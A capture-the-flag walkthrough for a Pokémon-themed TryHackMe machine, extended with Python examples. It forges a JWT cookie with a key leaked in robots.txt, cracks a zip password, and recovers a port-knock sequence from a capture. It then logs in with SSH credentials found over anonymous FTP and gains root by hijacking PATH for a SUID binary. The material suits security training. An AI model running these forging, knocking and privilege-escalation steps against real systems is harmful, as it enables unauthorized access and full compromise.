This post is the official write-up for the Pallet City themed machine used in Sacramentum CTF. You can find these machines on Tryhackme (when they get officially added).
Let's get started by deploying the machine. Once it is up, start with a basic Nmap scan to see which ports and services are open on the target IP address.
sudo nmap -sC -sV -T4 10.10.150.118 -oA pallet
From the Nmap results, some quick observations: anonymous FTP login is allowed, SSH shows as filtered, and there is a website on port 80 that has a robots.txt file.
Let’s take a look at the website first.
After looking at the home page and its source there is not much to conclude here. But I generally make sure to note down any names that pop up on these websites, which is Ash Ketchum in this case. Earlier, Nmap told us about the robots.txt file, so let's take a look at that.
At first glance the robots.txt page looks unremarkable, but if you look closely at the end there is some useful information.
Let's note down the key, as we don't yet know what it is for. The Disallow entries list paths the site owner did not want crawled, which is exactly why a robots.txt file is worth reading during enumeration: it hands you paths you would otherwise have to brute-force.
Now let's visit the given paths and see if we can find something there.
These were the two paths from robots.txt; I was unable to get any workable information out of them directly. Let's fire up Burp Suite and take a look at the requests going to the application.
When we intercept the request we can see that the cookie being used here is a JWT. A JWT is signed, not encrypted, so anyone can decode it and read the claims; what stops us changing the values is the signature, and that only holds as long as the signing key stays secret. Let's try to decode it and see whether the key from robots.txt lets us re-sign it.
Here I used the "key" from robots.txt as the HS256 secret. There is a name claim with the value user, so we change it to "AshKetchum", the username we discovered on the website, and re-sign the token.
After this, we simply replace the existing jwt cookie with the forged one and see the result.
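The decode, edit and re-sign steps above, written out as an added example (this is not code from the original write-up). It implements HS256 by hand with the standard library so nothing needs installing. The key, the claim name `name` and the original value `user` are assumptions standing in for what the challenge leaks; the token is constructed here. It also shows the negative case: editing the payload without re-signing fails the server-side check, which is why the leaked key matters.

```python
import base64
import hashlib
import hmac
import json

# Constructed for this example: a stand-in for the key leaked through robots.txt.
LEAKED_KEY = "pallet-city-example-key"


def b64url_encode(raw: bytes) -> str:
    """JWT uses unpadded base64url for every segment."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str):
    """Decode without verifying: this is what a JWT debugger shows you."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
        b64url_decode(sig_b64),
    )


def sign_jwt(header: dict, payload: dict, key: str) -> str:
    """HS256 = HMAC-SHA256 over 'base64url(header).base64url(payload)'."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    mac = hmac.new(key.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def verify_jwt(token: str, key: str) -> bool:
    """What the server does: recompute the MAC and compare in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(key.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def forge_claims(token: str, key: str, **new_claims) -> str:
    """Take an existing HS256 token, change claims, and re-sign with the leaked key."""
    header, payload, _ = decode_jwt(token)
    if header.get("alg") != "HS256":
        raise ValueError(f"this example only handles HS256, got {header.get('alg')}")
    payload.update(new_claims)
    return sign_jwt(header, payload, key)


def tamper_without_key(token: str, **new_claims) -> str:
    """Edit the payload but keep the old signature: the server-side check fails."""
    header_b64, _, sig_b64 = token.split(".")
    _, payload, _ = decode_jwt(token)
    payload.update(new_claims)
    new_payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{header_b64}.{new_payload_b64}.{sig_b64}"


# Constructed sample cookie, as the application might issue it to an ordinary user.
ORIGINAL_TOKEN = sign_jwt({"alg": "HS256", "typ": "JWT"}, {"name": "user"}, LEAKED_KEY)

if __name__ == "__main__":
    forged = forge_claims(ORIGINAL_TOKEN, LEAKED_KEY, name="AshKetchum")
    print("forged cookie:", forged)
    print("server accepts forged token:", verify_jwt(forged, LEAKED_KEY))
    unsigned_edit = tamper_without_key(ORIGINAL_TOKEN, name="AshKetchum")
    print("server accepts unsigned edit:", verify_jwt(unsigned_edit, LEAKED_KEY))
```

Paste the forged value into the cookie header in Burp's repeater exactly as printed; the segments are already base64url without padding, which is what the server expects.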
As we can see in the response, we get the first flag for the machine along with a hint. Let's take a look at the hint.
When opening the zip file it asks for a password, and we don't have a clue what it is. So let's try to crack it with fcrackzip.
As we can see, we got the password for the zip file. Now let's quickly unzip it and see what it contains.
When I open these types of archives I generally run ls -la, which helps if there is a hidden file (not the case here). Then I ran file * to see what type of files these actually are, since extensions can be misleading: in this case hint.docx is really a pcap capture that can be analyzed in Wireshark, and if you open it as a document you will not find anything to work with.
This was the image present in the hints folder. It indicates that port 22 is protected by port knocking, which explains why Nmap showed SSH as filtered.
Now let's take a look at the pcap.png file.
After analyzing "hint.pcap.png", a port knocking sequence can be seen: 11701, 11702, 11703.
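The two checks above, identifying a file by its content rather than its extension and pulling the knock sequence out of a capture, as an added example (not code from the original write-up). The capture is constructed in the block: three SYNs from an assumed attacker address to the box, with one knock retransmitted to show why consecutive duplicates are collapsed. It goes a little beyond the write-up in that it handles any classic pcap over Ethernet, not just this one.

```python
import struct

LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = b"\x08\x00"
IPPROTO_TCP = 6
TCP_SYN, TCP_ACK = 0x02, 0x10


def identify(data: bytes) -> str:
    """Magic-byte check, the same idea as `file`: trust the content, not the extension."""
    if data[:4] == b"PK\x03\x04":
        return "zip (a real .docx is a zip container)"
    if data[:4] in (b"\xd4\xc3\xb2\xa1", b"\xa1\xb2\xc3\xd4"):
        return "pcap"
    if data[:4] == b"\x0a\x0d\x0d\x0a":
        return "pcapng"
    if data[:8] == b"\x89PNG\r\n\x1a\n":
        return "png"
    return "unknown"


def syn_destination_ports(data: bytes) -> list:
    """Walk a classic pcap and return the destination ports of bare SYNs, in order.

    Consecutive repeats are collapsed: a knock that gets no answer is usually
    retransmitted and would otherwise show up as a doubled port.
    """
    order = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}[data[:4]]
    linktype = struct.unpack(order + "I", data[20:24])[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    ports, off = [], 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(order + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != IPPROTO_TCP or len(ip) < ihl + 20:
            continue
        tcp = ip[ihl:]
        dport = struct.unpack("!H", tcp[2:4])[0]
        flags = tcp[13]
        if flags & TCP_SYN and not flags & TCP_ACK:
            if not ports or ports[-1] != dport:
                ports.append(dport)
    return ports


# --- constructed sample capture: knocks from an assumed 10.10.10.1 to the box ---
def _syn_frame(dport: int) -> bytes:
    eth = b"\x00\x0c\x29\x00\x00\x01" + b"\x00\x0c\x29\x00\x00\x02" + ETHERTYPE_IPV4
    tcp = struct.pack("!HHIIBBHHH", 40000, dport, 1, 0, 5 << 4, TCP_SYN, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     bytes([10, 10, 10, 1]), bytes([10, 10, 150, 118]))
    return eth + ip + tcp


def build_pcap(frames) -> bytes:
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    body = b"".join(
        struct.pack("<IIII", 1600000000 + i, 0, len(f), len(f)) + f for i, f in enumerate(frames)
    )
    return header + body


SAMPLE_PCAP = build_pcap([_syn_frame(p) for p in (11701, 11702, 11702, 11703)])

if __name__ == "__main__":
    print(identify(SAMPLE_PCAP), syn_destination_ports(SAMPLE_PCAP))
```

On a real capture, read the file in binary mode and hand the bytes to `identify` first; if it reports pcapng (the default Wireshark format) this parser will not work as-is, so save the capture as classic pcap or filter in Wireshark with `tcp.flags.syn == 1 && tcp.flags.ack == 0` instead.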
Now, if we take stock, we have a few things to work with, but an SSH password or some sort of SSH key is still missing. Let's take a look at the FTP service, which had anonymous login enabled, and see if we can find anything there.
When we log in to FTP as the anonymous user we can see a '...' folder; inside it there is a .ssh file. We can pull the file to our local machine with the get command.
Now let's quickly see what is in the .ssh file.
Looks like we have found a password for SSH, and the username could be "ashketchum", the name that was on the landing page of the website.
First, since SSH was filtered, we have to port knock with the sequence we found in the capture.
knock 10.10.150.118 11701 11702 11703
After this, we run Nmap again to see whether the SSH port is now open.
As we can see, the SSH port is now open, and we have the credentials.
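The knock-then-check procedure above, as an added example (not code from the original write-up) that does what the knock command does with plain sockets: one connection attempt per port in order, then a probe of port 22. A knock is just a SYN, so the connection attempts are expected to fail; only the order and timing matter. The `FakeKnockd` class is a constructed stand-in for the daemon on the box so the logic can be exercised offline; it is not knockd's code.

```python
import socket
import time


def tcp_probe(host: str, port: int, timeout: float = 0.5) -> bool:
    """Send one connection attempt (a single SYN) and report whether the port accepted it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0


def knock(host: str, sequence, delay: float = 0.2, probe=tcp_probe) -> list:
    """Hit each port in order. The answers do not matter; the daemon only watches the SYNs."""
    hit = []
    for port in sequence:
        probe(host, port)
        hit.append(port)
        time.sleep(delay)
    return hit


def knock_and_check(host: str, sequence, target: int = 22, delay: float = 0.2, probe=tcp_probe) -> bool:
    """Knock, then report whether the guarded port accepts connections afterwards."""
    knock(host, sequence, delay=delay, probe=probe)
    return probe(host, target)


class FakeKnockd:
    """Constructed stand-in for the daemon on the box (not real knockd code).

    It opens `guarded` only after the exact secret sequence arrives in order; a wrong
    port resets progress, so the sequence has to be replayed from the start.
    """

    def __init__(self, secret, guarded: int = 22):
        self.secret, self.guarded = list(secret), guarded
        self.progress, self.opened = 0, False

    def probe(self, host: str, port: int) -> bool:
        if port == self.guarded:
            return self.opened
        if port == self.secret[self.progress]:
            self.progress += 1
            if self.progress == len(self.secret):
                self.opened, self.progress = True, 0
        else:
            self.progress = 1 if port == self.secret[0] else 0
        return False


if __name__ == "__main__":
    # Against the real box this would be: knock_and_check("10.10.150.118", [11701, 11702, 11703])
    daemon = FakeKnockd([11701, 11702, 11703])
    print("wrong order opens 22:", knock_and_check("box", [11703, 11702, 11701], delay=0, probe=daemon.probe))
    print("right order opens 22:", knock_and_check("box", [11701, 11702, 11703], delay=0, probe=daemon.probe))
```

If the box sits behind a firewall that drops rather than rejects, each probe waits out its timeout; that is harmless, but keep the delay short enough that the whole sequence lands inside the daemon's window.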
Now that we are on the box, let's try to find the user flag.
A simple ls shows the flag.
For privilege escalation, we run
find / -perm /4000 2>/dev/null
If you have some experience in privilege escalation you will immediately notice that "/var/log/esctime" is a custom SUID binary that is not present by default.
So let's try to execute the binary and see what it does.
As we can see, it just prints some random text, right?
So let's run strings on it and see if we can find something else to work with.
We can clearly see that the binary just runs cat /nothing/here and prints the result.
This is a textbook case for relative path exploitation (PATH hijacking); you can learn more about it by clicking here.
In short, the binary executes cat without specifying its full path, so the shell resolves it by walking the PATH variable and runs the first cat it finds.
So if we put a directory we control at the front of PATH and drop our own cat there, the SUID program will run our malicious cat instead of the one normally installed in /bin.
To escalate privileges, follow the steps below.
cd /tmp
nano cat
Type /bin/bash into the editor when it opens and save the file.
Now make the file executable
chmod 777 cat
Now prepend /tmp to your PATH variable. It has to come before /bin and /usr/bin, otherwise the real cat is found first and nothing happens.
Now run the binary
After running the binary you get a root shell, which leads you to the last flag.
Since we changed PATH, a bare cat would now run our fake one again, so use the full path /bin/cat to read the flag.
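The whole procedure above, reproduced as an added example (not the write-up's commands) so you can watch the hijack happen without the SUID binary: it plants a fake cat in a temporary directory, prepends that directory to PATH, and runs the same `cat /nothing/here` command the binary runs through a shell, once as the binary does it and once with an absolute path. The fake cat prints a marker instead of launching /bin/bash so the result can be checked; the command string and the choice of a shell stand in for whatever the real binary calls and are assumptions.

```python
import os
import shutil
import subprocess
import tempfile

# Constructed payload. The write-up's fake cat contains just "/bin/bash"; this one prints a
# marker instead so the outcome can be checked without an interactive shell.
FAKE_CAT = "#!/bin/sh\necho hijacked-by-fake-cat\n"


def plant_fake_cat(directory: str) -> str:
    path = os.path.join(directory, "cat")
    with open(path, "w") as fh:
        fh.write(FAKE_CAT)
    os.chmod(path, 0o755)  # the execute bit is what matters; chmod 777 as in the write-up works too
    return path


def hijacked_env(directory: str) -> dict:
    """PATH lookup is first match wins, so the attacker's directory has to come first."""
    env = dict(os.environ)
    env["PATH"] = directory + os.pathsep + env.get("PATH", "/usr/bin:/bin")
    return env


def run_vulnerable(env: dict) -> subprocess.CompletedProcess:
    """Models the SUID binary: a relative 'cat' handed to a shell, resolved via PATH (assumed)."""
    return subprocess.run(["sh", "-c", "cat /nothing/here"], env=env, capture_output=True, text=True)


def run_hardened(env: dict) -> subprocess.CompletedProcess:
    """Same command with an absolute path: the attacker's PATH no longer matters."""
    return subprocess.run(["sh", "-c", "/bin/cat /nothing/here"], env=env, capture_output=True, text=True)


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        fake = plant_fake_cat(tmp)
        env = hijacked_env(tmp)
        hardened = run_hardened(env)
        return {
            "resolved_before": shutil.which("cat"),
            "resolved_after": shutil.which("cat", path=env["PATH"]),
            "fake_path": fake,
            "vulnerable_stdout": run_vulnerable(env).stdout.strip(),
            "hardened_stdout": hardened.stdout.strip(),
            "hardened_rc": hardened.returncode,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two things worth knowing when you do this for real: if the shell you get drops back to your own uid, run /bin/bash -p, which keeps the effective uid the SUID binary gave it; and the fix on the developer side is the hardened form, an absolute path (or a sanitized PATH) before the binary ever calls out to a shell.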
If you liked this write-up, there are many more like it here.